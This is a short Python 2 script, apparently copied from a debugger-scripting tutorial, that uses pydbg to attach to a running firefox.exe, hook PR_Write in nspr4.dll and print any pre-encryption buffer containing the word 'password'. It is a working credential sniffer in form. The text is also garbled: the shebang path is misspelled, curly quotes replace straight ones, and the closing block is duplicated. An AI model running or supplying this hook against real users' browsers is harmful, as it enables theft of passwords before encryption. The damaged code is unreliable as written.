- #!/ur/bin/env Python
- from pydbg import *
- from pydbg.defines import *
- import utils
- import sys
- dbg = pydbg()
- found_firefox = False
- pattern = “password”
- def ssl_sniff( dbg, args ):
- buffer = “”
- offset = 0
- while 1:
- byte = dbg.read_process_memory( args[1] + offset, 1 )
- if byte != “\x00”:
- buffer += byte
- offset += 1
- continue
- else:
- break
- if pattern in buffer:
- print “Pre-Encrypted: %s” % buffer
- # 寻找firefox.exe的进程
- for (pid, name) in dbg.enumerate_processes():
- if name.lower() == “firefox.exe”:
- found_firefox = True
- hooks = utils.hook_container()
- dbg.attach(pid)
- print “[*] Attaching to firefox.exe with PID: %d” % pid
- # 得到firefox的hook的 address
- hook_address = dbg.func_resolve_debuggee(“nspr4.dll”,“PR_Write”)
- if hook_address:
- # 添加hook的内容,包括他的pid,地址,嗅探类型
- hooks.add( dbg, hook_address, 2, ssl_sniff, None )
- print “[*] nspr4.PR_Write hooked at: 0x%08x” % hook_address
- break
- else:
- print “[*] Error: Couldn’t resolve hook address.”
- sys.exit(-1)
- if found_firefox:
- print “[*] Hooks set, continuing process.”
- dbg.run()
- else:
- print “[*] Error: Couldn’t find the firefox.exe process.”
- sys.exit(-1)
- if found_firefox:
- print “[*] Hooks set, continuing process.”
- dbg.run()
- else:
- print “[*] Error: Couldn’t find the firefox.exe process.”
- sys.exit(-1)